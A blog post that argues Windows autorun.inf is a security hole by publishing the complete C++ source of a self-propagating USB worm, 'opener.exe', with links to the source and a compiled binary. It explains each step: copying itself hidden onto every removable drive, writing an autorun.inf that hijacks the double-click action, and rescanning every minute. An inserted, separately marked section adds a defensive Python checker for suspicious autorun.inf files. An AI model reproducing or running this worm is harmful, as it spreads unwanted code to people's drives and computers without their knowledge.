Opener: A USB Flash Drive Virus

For a really long time, people have been telling Microsoft that autorun.inf is not only a stupid idea, but it's also a security risk. Pretty much whenever a computer does something the user didn't specifically ask it to do, it's a potential security risk, and you can always rely on Microsoft to make the potential an actual.

Of course, talk is cheap. If autorun.inf is such a big security hole, it really shouldn't be hard to prove, should it? Fair enough, here's some code:


#include <windows.h>
#include <tchar.h>
#include <stdlib.h>
#include <string.h>

/* Build with UNICODE defined: the code uses WCHAR buffers and L"" strings throughout. */

/* The autorun.inf written to each drive: defines a verb named "eject" that runs
   opener.exe and makes it the default (double-click) action. */
#define AUTORUN_CONTENTS "[autorun]\r\nshell\\eject=Eject\r\nshell\\eject\\command=opener.exe\r\nshell=eject\r\n"

HANDLE hmutex = NULL;

/* Release the single-instance mutex on exit. */
void closing()
{
	if (hmutex)
		ReleaseMutex(hmutex);
}

int APIENTRY _tWinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPTSTR    lpCmdLine,
                     int       nCmdShow)
{
	UNREFERENCED_PARAMETER(hInstance);
	UNREFERENCED_PARAMETER(hPrevInstance);
	UNREFERENCED_PARAMETER(lpCmdLine);
	UNREFERENCED_PARAMETER(nCmdShow);

	/* Step 1: find our own path and open an Explorer window for the drive we are
	   running from, so the double-click looks like it simply opened the drive. */
	WCHAR myfile[1024];
	GetModuleFileName(NULL, myfile, 1024);
	if (myfile[1] != L':')
		return 1;
	WCHAR cmd[1024];
	wsprintf(cmd, L"explorer %c:\\", myfile[0]);
	STARTUPINFOW si;
	memset(&si, 0, sizeof(si));
	si.cb = sizeof(si);
	PROCESS_INFORMATION po;
	memset(&po, 0, sizeof(po));
	if (CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &po)) {
		CloseHandle(po.hThread);
		CloseHandle(po.hProcess);
	}

	/* Step 2: a named mutex makes sure only one copy is running.
	   CreateMutex returns NULL (not INVALID_HANDLE_VALUE) on failure. */
	hmutex = CreateMutex(NULL, TRUE, L"Opener");
	if (hmutex == NULL)
		return 1;
	if (GetLastError() == ERROR_ALREADY_EXISTS) {
		CloseHandle(hmutex);
		return 1;
	}

	atexit(closing);

	/* Read our own image into memory so it can be copied to each drive.
	   CreateFile returns INVALID_HANDLE_VALUE (not NULL) on failure. */
	HANDLE hmyfile = CreateFile(myfile, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hmyfile == INVALID_HANDLE_VALUE)
		return 1;
	DWORD szhigh = 0;
	DWORD szlow = GetFileSize(hmyfile, &szhigh);
	if (szlow == INVALID_FILE_SIZE || szhigh != 0) {	/* give up on anything over 4 GiB */
		CloseHandle(hmyfile);
		return 1;
	}
	void *myfilemem = malloc(szlow);	/* szhigh is known to be 0 here */
	DWORD nread = 0;
	if (myfilemem == NULL || !ReadFile(hmyfile, myfilemem, szlow, &nread, NULL) || nread != szlow) {
		CloseHandle(hmyfile);
		return 1;
	}
	CloseHandle(hmyfile);

	/* Steps 3 to 11: poll the drive list forever. */
	while(1) {
		DWORD mask = GetLogicalDrives();
		for (int i = 0; i < 26; i++)
			if (mask & (1 << i)) {
				WCHAR path[100];
				path[0] = L'A' + i;
				path[1] = L':';
				path[2] = L'\\';
				path[3] = 0;
				/* Step 3: only removable drives are of interest. */
				DWORD type = GetDriveType(path);
				if (type == DRIVE_REMOVABLE) {
					DWORD spc, bps, nfc, tnc;
					if (GetDiskFreeSpace(path, &spc, &bps, &nfc, &tnc)) {
						/* Step 4, as the code actually tests it: free clusters fewer than
						   total clusters, i.e. not every cluster on the drive is free. */
						if (nfc < tnc) {
							/* Step 5: leave drives that already carry an autorun.inf alone. */
							wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
							if (GetFileAttributes(path) == INVALID_FILE_ATTRIBUTES) {
								/* Steps 6 and 8: write autorun.inf, created with the hidden attribute. */
								HANDLE h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
								if (h != INVALID_HANDLE_VALUE) {
									DWORD written;
									WriteFile(h, AUTORUN_CONTENTS, (DWORD)strlen(AUTORUN_CONTENTS), &written, NULL);
									CloseHandle(h);
									/* Steps 7 and 8: write a hidden copy of ourselves next to it. */
									wsprintf(path, L"%c:\\opener.exe", L'A' + i);
									h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
									if (h != INVALID_HANDLE_VALUE) {
										WriteFile(h, myfilemem, szlow, &written, NULL);
										CloseHandle(h);
									} else {
										/* Could not write the executable: remove the autorun.inf again. */
										wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
										DeleteFile(path);
									}
								}
							}
						}
					}
				}
			}
		/* Step 10: wait about a minute, then rescan (step 11). */
		Sleep(1000 * 60);
	}

	return 0;
}
Download: opener.cpp, and here it is compiled: opener.exe.

How does it work?

It's really quite simple:

  1. Open an explorer window for the drive we're running from.
  2. Make sure there is only one copy of opener.exe running.
  3. Scan the available drives for any that are removable.
  4. Check that there is some free space on the drive.
  5. Check that the drive doesn't already have an autorun.inf.
  6. Dump the following into autorun.inf:
    [autorun]
    shell\eject=Eject
    shell\eject\command=opener.exe
    shell=eject
    
    This creates a new shell command which I've just randomly named "Eject" and, importantly, makes it the default action.
  7. Write a copy of opener.exe to the drive.
  8. Mark both autorun.inf and opener.exe as hidden.
  9. Do the same for any other removable drives we can find.
  10. Wait about a minute.
  11. Go back to step 3.
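As an added check that is not part of the original post, here is a small Python auditor for the autorun.inf format the steps above describe: it parses the file, resolves the default verb the way this example assumes Explorer does (the verb named by shell= first, then open=, then shellexecute=), and flags a default action that launches a program from the drive. The sample input is constructed from the autorun.inf in step 6.

```python
# Constructed sample: the exact autorun.inf that the page's opener.exe writes.
SAMPLE_AUTORUN = (
    "[autorun]\r\n"
    "shell\\eject=Eject\r\n"
    "shell\\eject\\command=opener.exe\r\n"
    "shell=eject\r\n"
)

def parse_autorun(text):
    """Return the key/value pairs of the [autorun] section, keys lower-cased."""
    keys = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            keys[key.strip().lower()] = value.strip()
    return keys

def default_action(keys):
    """What Explorer would run for the drive's default (double-click) verb.
    Precedence assumed here: the verb named by shell=, then open=, then shellexecute=."""
    verb = keys.get("shell", "").lower()
    if verb and ("shell\\%s\\command" % verb) in keys:
        return ("shell:" + verb, keys["shell\\%s\\command" % verb])
    if "open" in keys:
        return ("open", keys["open"])
    if "shellexecute" in keys:
        return ("shellexecute", keys["shellexecute"])
    return None

EXECUTABLE_SUFFIXES = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif")

def audit(text):
    """Flag an autorun.inf whose default action launches a program from the drive."""
    action = default_action(parse_autorun(text))
    if action is None:
        return {"suspicious": False, "source": None, "command": None}
    source, command = action
    parts = command.split()
    target = parts[0].strip('"').lower() if parts else ""
    return {"suspicious": target.endswith(EXECUTABLE_SUFFIXES),
            "source": source, "command": command}
```

Run it over the autorun.inf of any removable drive you are handed (hidden or not): a label/icon-only file comes back clean, while the file from step 6 reports that a double-click would run opener.exe.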

So once opener is running, go ahead and insert a flash drive and wait a little. If you have "show hidden files" turned on in the Folder Options (the default is off, thanks again Microsoft) you will be able to see when the drive has been infected. Remove the drive, use Task Manager to kill opener.exe, and now plug the drive back in. If you're used to having Windows pop up the "I've found a new drive, what should I do?" box, then you'll immediately notice the change: it won't pop up now. You may have had this experience before; it's kinda random when Windows will and won't pop up that box.

No matter, go to My Computer as you typically would and double click on the drive that has been found, as you would normally do to open it. If you're like me and turn off the "give me a new window every time I sneeze" behaviour in the Folder Options, then you will now notice another slight change in behaviour, in that you will get a new window for the drive. If you check Task Manager now you will see that opener.exe is running again.

And so the cycle continues.

Dear Microsoft, please fix, thanks.


QuantumG